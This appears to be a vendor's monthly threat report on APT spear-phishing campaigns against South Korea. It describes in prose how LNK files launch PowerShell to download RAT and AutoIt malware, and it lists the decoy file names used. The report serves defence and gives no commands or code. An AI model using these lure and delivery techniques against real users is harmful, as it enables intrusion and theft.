November 2025 APT Attack Trends Report (South Korea)
Overview
AhnLab is monitoring APT (Advanced Persistent Threat) attacks in South Korea using our own infrastructure. This report covers the classification and statistics of APT attacks in South Korea that were identified over the course of one month in November 2025. It also provides an overview of the features of each attack type.
Figure 1. Statistics of APT attacks in South Korea in November 2025
In Korea, most of the identified APT attacks were distributed using the spear phishing method. In October 2025, attacks using JSE files have increased compared to the past, and these attacks accounted for the largest portion among all attack types.
APT Group Targets South Korea
The following are the cases and features of APT attacks in Korea identified in November 2025.
1) Spear Phishing
Spear Phishing is a type of phishing attack that targets specific individuals or groups. Unlike regular phishing attacks, threat actors collect and analyze information about their targets during the reconnaissance phase before launching their attacks. Threat actors utilize the gathered information to craft their phishing emails, so users who receive these emails are more likely to trust them. In some cases, threat actors also spoof their email addresses. Most spear phishing attacks include malicious attachments or links in their emails, which prompt users to open them.
The following are the types of malware distributed using this technique.
1.1 Attacks Using LNK
Type A
This type involves executing RAT malware. They are mainly distributed in a compressed file format along with normal files. The identified LNK files contain malicious PowerShell commands. The malware uses the Dropbox API or Google Drive to download additional scripts and obfuscated RAT malware into the user’s PC. The executed RAT malware performs various malicious behaviors according to the threat actor’s commands, such as keylogging and capturing screenshots. The identified RAT types include XenoRAT and RoKRAT.
The confirmed file name is as follows.
|
File Name |
|---|
| October 2025 Translation Let’s make the ceasefire bring judgment for Israel’s crimes. |
| 2025-11-05_pha20250076959.lnk |
| North Korea-related Documents.lnk |
Table 1. Filenames confirmed
Type B
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A characteristic of this type is that during this process, the curl.exe program is copied under a different file name (e.g., WpqNoXz.exe) and then executed. As a result, a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded file is registered in the task scheduler so that it can be executed continuously. The malicious AutoIt script can perform the following functions: execute commands, search directories, upload files, and download files.
The confirmed file name is as follows.
|
File Name |
|---|
| 1. Instructions for Submitting Bank Transaction History.hwp.lnk |
| **Consent to the Collection, Use, and Provision of Bank Personal (Credit) Information.pdf.lnk |
| ** Promotional Video Subtitle Script.docx.lnk |
| Statement of Origin of Undeclared Funds (Enforcement Decree of the Value-Added Tax Act).hwp.lnk |
Table 2. Detected file names
The following are decoy files that make it appear as if the user has executed a legitimate file.
Figure 2. Identified decoy file
